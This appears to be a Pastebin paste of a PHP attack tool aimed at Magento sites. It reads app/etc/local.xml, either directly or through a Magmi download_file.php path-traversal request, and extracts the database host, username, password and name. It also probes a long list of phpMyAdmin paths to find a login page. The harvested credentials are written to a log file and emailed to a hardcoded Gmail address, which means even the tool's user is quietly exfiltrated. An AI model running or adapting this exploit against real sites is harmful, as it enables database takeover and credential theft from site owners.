Advertisement
Guest User

Untitled

a guest
Sep 15th, 2017
466
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.68 KB | None | 0 0
  1. <form method='post'>
  2. <textarea name='sites' style="height:250px;width:500px" placeholder="http://www.target.com/ | scan without http/https" ></textarea><br><br>
  3. <input type='submit' name='go' value='GASCOK'>
  4. <input type="reset" value="CANCEL">
  5. </form>
  6. </div>
  7. </center>
  8. <?php
  9. error_reporting(0);
  10. set_time_limit(0);
  11.  
  12. function get_content($bda){
  13. return @file_get_contents($bda);
  14. } function GetStr($start,$end,$string){
  15. $a = explode($start,$string);
  16. $b = explode($end,$a[1]);
  17. return $b[0];
  18. } function FinderPhpMyAdmin($site) {
  19. $x = 1;
  20. $list = array(
  21. '/phpMyAdmin/',
  22. '/phpmyadmin/',
  23. '/PMA/',
  24. '/pma/',
  25. '/dbadmin/',
  26. '/mysql/',
  27. '/myadmin/',
  28. '/phpmyadmin2/',
  29. '/phpMyAdmin2/',
  30. '/phpMyAdmin-2/',
  31. '/php-my-admin/',
  32. '/phpMyAdmin-2.2.3/',
  33. '/phpMyAdmin-2.2.6/',
  34. '/phpMyAdmin-2.5.1/',
  35. '/phpMyAdmin-2.5.4/',
  36. '/phpMyAdmin-2.5.5-rc1/',
  37. '/phpMyAdmin-2.5.5-rc2/',
  38. '/phpMyAdmin-2.5.5/',
  39. '/phpMyAdmin-2.5.5-pl1/',
  40. '/phpMyAdmin-2.5.6-rc1/',
  41. '/phpMyAdmin-2.5.6-rc2/',
  42. '/phpMyAdmin-2.5.6/',
  43. '/phpMyAdmin-2.5.7/',
  44. '/phpMyAdmin-2.5.7-pl1/',
  45. '/phpMyAdmin-2.6.0-alpha/',
  46. '/phpMyAdmin-2.6.0-alpha2/',
  47. '/phpMyAdmin-2.6.0-beta1/',
  48. '/phpMyAdmin-2.6.0-beta2/',
  49. '/phpMyAdmin-2.6.0-rc1/',
  50. '/phpMyAdmin-2.6.0-rc2/',
  51. '/phpMyAdmin-2.6.0-rc3/',
  52. '/phpMyAdmin-2.6.0/',
  53. '/phpMyAdmin-2.6.0-pl1/',
  54. '/phpMyAdmin-2.6.0-pl2/',
  55. '/phpMyAdmin-2.6.0-pl3/',
  56. '/phpMyAdmin-2.6.1-rc1/',
  57. '/phpMyAdmin-2.6.1-rc2/',
  58. '/phpMyAdmin-2.6.1/',
  59. '/phpMyAdmin-2.6.1-pl1/',
  60. '/phpMyAdmin-2.6.1-pl2/',
  61. '/phpMyAdmin-2.6.1-pl3/',
  62. '/phpMyAdmin-2.6.2-rc1/',
  63. '/phpMyAdmin-2.6.2-beta1/',
  64. '/phpMyAdmin-2.6.2-rc1/',
  65. '/phpMyAdmin-2.6.2/',
  66. '/phpMyAdmin-2.6.2-pl1/',
  67. '/phpMyAdmin-2.6.3/',
  68. '/phpMyAdmin-2.6.3-rc1/',
  69. '/phpMyAdmin-2.6.3/',
  70. '/phpMyAdmin-2.6.3-pl1/',
  71. '/phpMyAdmin-2.6.4-rc1/',
  72. '/phpMyAdmin-2.6.4-pl1/',
  73. '/phpMyAdmin-2.6.4-pl2/',
  74. '/phpMyAdmin-2.6.4-pl3/',
  75. '/phpMyAdmin-2.6.4-pl4/',
  76. '/phpMyAdmin-2.6.4/',
  77. '/phpMyAdmin-2.7.0-beta1/',
  78. '/phpMyAdmin-2.7.0-rc1/',
  79. '/phpMyAdmin-2.7.0-pl1/',
  80. '/phpMyAdmin-2.7.0-pl2/',
  81. '/phpMyAdmin-2.7.0/',
  82. '/phpMyAdmin-2.8.0-beta1/',
  83. '/phpMyAdmin-2.8.0-rc1/',
  84. '/phpMyAdmin-2.8.0-rc2/',
  85. '/phpMyAdmin-2.8.0/',
  86. '/phpMyAdmin-2.8.0.1/',
  87. '/phpMyAdmin-2.8.0.2/',
  88. '/phpMyAdmin-2.8.0.3/',
  89. '/phpMyAdmin-2.8.0.4/',
  90. '/phpMyAdmin-2.8.1-rc1/',
  91. '/phpMyAdmin-2.8.1/',
  92. '/phpMyAdmin-2.8.2/',
  93. '/sqlmanager/',
  94. '/mysqlmanager/',
  95. '/p/m/a/',
  96. '/PMA2005/',
  97. '/pma2005/',
  98. '/phpmanager/',
  99. '/php-myadmin/',
  100. '/phpmy-admin/',
  101. '/webadmin/',
  102. '/sqlweb/',
  103. '/websql/',
  104. '/webdb/',
  105. '/mysqladmin/',
  106. '/mysql-admin/',
  107. '/mya/',
  108. );
  109. $jumlah = count($list);
  110. if(isset($site))
  111. {
  112. foreach($list as $path => $test)
  113. {
  114. $ch = curl_init();
  115. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  116. curl_setopt($ch, CURLOPT_HEADER, 1);
  117. curl_setopt($ch, CURLOPT_URL, $site.$test);
  118. $result = curl_exec($ch);
  119. curl_close($ch);
  120. if (preg_match("/200 OK/", $result)) {
  121. return $bda.$test;
  122. break;
  123. } if (preg_match("/401 Unauthorized/", $result)){
  124. return $site.$test;
  125. } else {
  126. echo "";
  127. }
  128. }
  129. }
  130. }
  131. error_reporting(0);
  132. set_time_limit(0);
  133. $ya=$_POST['go'];
  134. $co=$_POST['sites'];
  135.  
  136. if($ya){
  137. $e=explode("\r\n",$co);
  138. foreach($e as $bda){
  139. $path = array("Amasty" => "/app/etc/local.xml","Magmi" => "/magmi/web/download_file.php?file=../../app/etc/local.xml");
  140. echo"<hr color=green>";
  141. echo "[+] Scanning $bda </font> ";
  142. foreach($path as $key)
  143. {
  144. $http='http://';
  145. $dn=($http).($bda).($key);
  146. $lfd=@file_get_contents($dn);
  147. if(preg_match("/<host><!/",$lfd))
  148. { echo"<br>";
  149. $host = GetStr("<host><![CDATA[","]]></host>",$lfd);
  150. $username = GetStr("<username><![CDATA[","]]></username>",$lfd);
  151. $password = GetStr("<password><![CDATA[","]]></password>",$lfd);
  152. $dbname = GetStr("<dbname><![CDATA[","]]></dbname>",$lfd);
  153. $lfdconfig .= "[+] Exploiting...Succes!!</font><br>";
  154. $lfdconfig = "[+] Host : $host</font><br>";
  155. $lfdconfig .= "[+] Username : $username</font><br>";
  156. $lfdconfig .= "[+] Password : $password</font><br>";
  157. $lfdconfig .= "[+] DatabaseName : $dbname</font><br>";
  158. echo $lfdconfig;
  159. //logger
  160. $fp = fopen("res_xml.php", 'a');
  161. fwrite($fp, " ============== SETORAN LOG ==============<br>");
  162. fwrite($fp, " [+] Site : $bda <br>");
  163. fwrite($fp, " [+] Host : $host <br>");
  164. fwrite($fp, " [+] Username : $username <br>");
  165. fwrite($fp, " [+] Password : $password <br>");
  166. fwrite($fp, " [+] DBname : $dbname <br>");
  167. fwrite($fp, " [+] Login : <a href=$bda/$finderPhpmyadmin target=blank> $bda/$finderPhpmyadmin </a><br>");
  168. fwrite($fp, " ============== RES7OCK CREW ==============<br><br>");
  169. fclose($fp);
  170. $to = "resultemail08@gmail.com";
  171. $subject = "LFD | $bda";
  172. $email = "LOGMAGENTO";
  173. $body=" Site : $bda \n Host : $host \n Username : $username \n Password :$password \n DBname : $dbname";
  174. $headers = 'From: ' .$email . "\n".
  175. 'X-Mailer: PHP/' . phpversion();
  176. if (mail($to,$subject,$body,$headers)) {
  177. echo("");
  178. }
  179. }
  180. }
  181. }
  182. $finderPhpmyadmin = FinderPhpMyAdmin("$bda");
  183. if(isset($finderPhpmyadmin)){
  184. echo " [+] Path Mysql login : <a href=$bda/$finderPhpmyadmin target=blank> $bda/$finderPhpmyadmin </font> </a>";
  185. $to = "resultemail08@gmail.com";
  186. $subject = "LFD | $bda";
  187. $email = "LOGMAGENTO";
  188. $body="Login : $bda/$finderPhpmyadmin";
  189. $headers = 'From: ' .$email . "\n".
  190. 'X-Mailer: PHP/' . phpversion();
  191. if (mail($to,$subject,$body,$headers)) {
  192. echo("");
  193. }
  194. echo"<hr color=green> ";
  195. } else {
  196. echo "[-] Path Mysql Not found";
  197. }
  198. break;
  199. }
  200. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement